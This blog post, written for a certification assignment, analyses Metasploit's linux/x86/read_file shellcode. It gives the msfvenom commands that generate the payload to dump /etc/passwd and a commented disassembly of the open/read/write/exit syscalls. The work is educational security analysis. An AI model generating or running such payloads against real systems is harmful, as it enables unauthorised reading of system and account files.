Analyzing Metasploit’s linux/x86/read_file payload

By August 28, 2018 SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 5.2
Github repo: https://github.com/kkirsche/SLAE


Introduction

Hey everyone! Today, we’re going to keep moving forward with our shellcode analysis work. Like last time, instead of writing our own assembly code, we’re instead going to analyze the work of someone else.

Requirements

  • Take at least 3 shellcode samples created using msfvenom for x86 Linux
  • Use GDB, ndisasm, and/or libemu to dissect the functionality of the shellcode
  • Present your analysis

As we said before, first off, this isn’t going to be the complete assignment 5, instead, this is going to discuss the second of the three shellcode samples generated using msfvenom for x86 Linux. I’ll be creating another article to discuss the final payload. With that in mind though, we can definitely meet the other two goals.

Our shellcode

So to get started, I had to choose what shellcode I was going to analyze. After looking through msfvenom’s payloads, I found one which seemed like it’d be interesting — the linux/x86/read_file payload by hal.

I think this one will be interesting to review as I wanted to focus on topics which we didn’t explicitly cover in the SLAE course, such as reading file contents using NASM.

If we take a look at what options we have, we see there are a fair number of them:

msfvenom linux/x86/read_file shellcode

Looking at these, we do have a number of advanced options which we won’t be working with. Instead, we’ll focus on FD (the file descriptor to write to) and the path (path of the file which we’ll dump the contents of).

In our case, we’ll stick to FD 1 (stdout) for our file descriptor. This will simplify the setup required to analyze the shellcode. We do need to set the path though. We’ll dump /etc/passwd, as that’s often a good starting point when we are trying to get access to a machine.

Let’s dig into our shellcode though!

Libemu

We’ll start off by analyzing the payload in libemu, which provides the sctest binary for analyzing what a payload does. We’re not going to cover the options, as we previously did in the first shellcode analysis document. But the basics of it is that we’re enabling verbose mode, reading the payload to analyze from stdin, and iterating through up to 10000 steps. If we’re lucky, this will give us pseudocode to start our analysis with.

msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000

Sadly, like last time, we don’t get any pseudocode. If we take a look at the execution graph, hopefully we’ll get a bit more. Realistically, I expect we’ll need to drop into ndisasm and walk through the assembly at a lower level to really analyze this.

msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000 -G read_file.dot && dot read_file.dot -T png > read_file.png

Sadly, this gives us an empty image. We need to drop directly into the raw assembly language instructions instead.

ndisasm


~ $ msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | ndisasm -u -
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 73 (iteration=0)
generic/none chosen with final size 73
Payload size: 73 bytes
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
0000003E 657463 gs jz 0xa4
00000041 2F das
00000042 7061 jo 0xa5
00000044 7373 jnc 0xb9
00000046 7764 ja 0xac
00000048 00 db 0x00

There we go, with a reasonably solid background in assembly, that should be easier for us to understand.

First function

Unlike the shell_find_tag payload we worked with in our last analysis, this one works a bit differently. We don’t just immediately begin our first function. Let’s dig into what we mean by looking at a subset of the instructions:


00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
...
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
...

If you’ve done much shellcoding before, you should recognize this JMP, CALL, POP sequence which we use to retrieve where an item (like the path to our file) is located in memory without relying on hard coded values.

First, we take a short jump from 00000000 to 00000038, we then call 0x2 which brings us up to the mov eax, 0x5 instruction and pushes 0000003D onto the stack. We can see this in GDB:

GDB after our function call

You can see here both the assembly before we execute the call. We then use stepi to step into the function, and push the next instruction onto the stack as our return address. We then examine this, and verify that this is in fact what happened. We have our das instruction on the stack for our return.

Now that we have this on the stack and we’re back at 00000002, we then move 0x5 into eax. This is setting up our first function, SYS_OPEN.


int open(const char *pathname, int flags);

We then pop the return address into EBX, giving us a pointer to our PATH variable from msfvenom in EBX.

PATH variable is in EBX

We then XOR ECX so that it’s 0x0 which is the value of the O_RDONLY flag. We then trigger an interrupt so that we call our function.

This leaves our registers look like so after each instruction:

Address Instruction EAX EBX ECX EDX EDI
00000002 mov eax,0x5 0x5 Unknown Unknown Unknown Unknown
00000007 pop ebx 0x5 0x8048091 Unknown Unknown Unknown
00000008 xor ecx,ecx 0x5 0x8048091 0x0 Unknown Unknown
0000000A int 0x80 0x3 0x8048091 0x0 Unknown Unknown

You’ll notice how after we trigger the interrupt, our value in EAX changed from 0x5 to 0x3, which is the return value of our call to open. We can read the open manpage for more information about the return value:


The return value of open() is a file descriptor, a small, nonnegative
integer that is used in subsequent system calls (read(2), write(2),
lseek(2), fcntl(2), etc.) to refer to the open file. The file
descriptor returned by a successful call will be the lowest-numbered
file descriptor not currently open for the process.

So we successfully called open! This is a good start.

Second Function

Now that we have our file descriptor, we can start the second function:


0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80

We first move the opened file descriptor value from EAX into EBX, as it’ll be a function argument for the second function. We then move 0x3 into EAX for our function. 0x3 is the value representing the SYS_READ system call.


ssize_t read(int fd, void *buf, size_t count);

So we already have int fd covered by putting the file descriptor in EBX. We then move the address ESP is pointing to into EDI and subsequently move it into ECX giving us a pointer to our buffer. And finally we move 0x1000 into EDX as our size_t value and trigger our interrupt.

Address Instruction EAX EBX ECX EDX EDI
00000002 mov eax,0x5 0x5 Unknown Unknown Unknown Unknown
00000007 pop ebx 0x5 0x8048091 Unknown Unknown Unknown
00000008 xor ecx,ecx 0x5 0x8048091 0x0 Unknown Unknown
0000000A int 0x80 0x3 0x8048091 0x0 Unknown Unknown
0000000C mov ebx,eax 0x3 0x3 0x0 Unknown Unknown
0000000E mov eax,0x3 0x3 0x3 0x0 Unknown Unknown
00000013 mov edi,esp 0x3 0x3 0x0 Unknown 0xffffd190
00000015 mov ecx,edi 0x3 0x3 0xffffd190 Unknown 0xffffd190
00000017 mov edx,0x1000 0x3 0x3 0xffffd190 0x1000 0xffffd190
0000001C int 0x80 0xd3a 0x3 0xffffd190 0x1000 0xffffd190

With our function called, we see that EAX holds a non-zero value. In this case, it’s the number of bytes which were read. In our case, 3386 decimal or 0xd3a hex.

Third Function


0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80

This one is nice and short. We move the length of the file we read into EDX, move 0x4 (sys_write system call) into EAX, and then 0x1 into EBX which is the FD variable we passed to msfvenom. In our case, that’s stdout. We then trigger the write function to write to stdout.

Address Instruction EAX EBX ECX EDX EDI
00000002 mov eax,0x5 0x5 Unknown Unknown Unknown Unknown
00000007 pop ebx 0x5 0x8048091 Unknown Unknown Unknown
00000008 xor ecx,ecx 0x5 0x8048091 0x0 Unknown Unknown
0000000A int 0x80 0x3 0x8048091 0x0 Unknown Unknown
0000000C mov ebx,eax 0x3 0x3 0x0 Unknown Unknown
0000000E mov eax,0x3 0x3 0x3 0x0 Unknown Unknown
00000013 mov edi,esp 0x3 0x3 0x0 Unknown 0xffffd190
00000015 mov ecx,edi 0x3 0x3 0xffffd190 Unknown 0xffffd190
00000017 mov edx,0x1000 0x3 0x3 0xffffd190 0x1000 0xffffd190
0000001C int 0x80 0xd3a 0x3 0xffffd190 0x1000 0xffffd190
0000001E mov edx,eax 0xd3a 0x3 0xffffd190 0xd3a 0xffffd190
00000020 mov eax,0x4 0x4 0x3 0xffffd190 0xd3a 0xffffd190
00000025 mov ebx,0x1 0x4 0x1 0xffffd190 0xd3a 0xffffd190
0000002A int 0x80 0xd3a 0x1 0xffffd190 0xd3a 0xffffd190

This returns into EAX the number of bytes that were written out to the file descriptor, which in our case is the full file.

Final Function


0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80

This is nice and simple, 0x1 is SYS_EXIT. 0x0 is our exit code, and then we exit cleanly.

Commented ASM Code

With a solid understanding of how this worked, let’s comment our assembly code accordingly:


00000000 EB36 jmp short 0x38 ; jump to 0x38 so that we get the address of our file path
00000002 B805000000 mov eax,0x5 ; SYS_OPEN system call
00000007 5B pop ebx ; file path into EBX
00000008 31C9 xor ecx,ecx ; O_RDONLY flag for SYS_OPEN command
0000000A CD80 int 0x80 ; execute SYS_OPEN function
0000000C 89C3 mov ebx,eax ; move the file descriptor which we've opened into EBX.
0000000E B803000000 mov eax,0x3 ; SYS_READ system call
00000013 89E7 mov edi,esp ; Move a pointer to our buffer into EDI.
00000015 89F9 mov ecx,edi ; Move the pointer into ECX for the buffer argument
00000017 BA00100000 mov edx,0x1000 ; define the size of our buffer
0000001C CD80 int 0x80 ; execute the READ call
0000001E 89C2 mov edx,eax ; Move the size of the file we read into EDX
00000020 B804000000 mov eax,0x4 ; SYS_WRITE system call
00000025 BB01000000 mov ebx,0x1 ; Move the FD msfvenom variable into EBX (where we will write the file to)
0000002A CD80 int 0x80 ; Write the contents out (this is where we see the contents!)
0000002C B801000000 mov eax,0x1 ; SYS_EXIT system call
00000031 BB00000000 mov ebx,0x0 ; 0 return value
00000036 CD80 int 0x80 ; exit cleanly
00000038 E8C5FFFFFF call 0x2 ; Call 0x2 so that we push the location of /etc/passwd onto the stack.
0000003D 2F das ; /
0000003E 657463 gs jz 0xa4 ; etc
00000041 2F das ; /
00000042 7061 jo 0xa5 ; pa
00000044 7373 jnc 0xb9 ; ss
00000046 7764 ja 0xac ; wd
00000048 00 db 0x00 ; null string terminator

And with this, we now understand how this payload works! This is awesome.

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Leave a Reply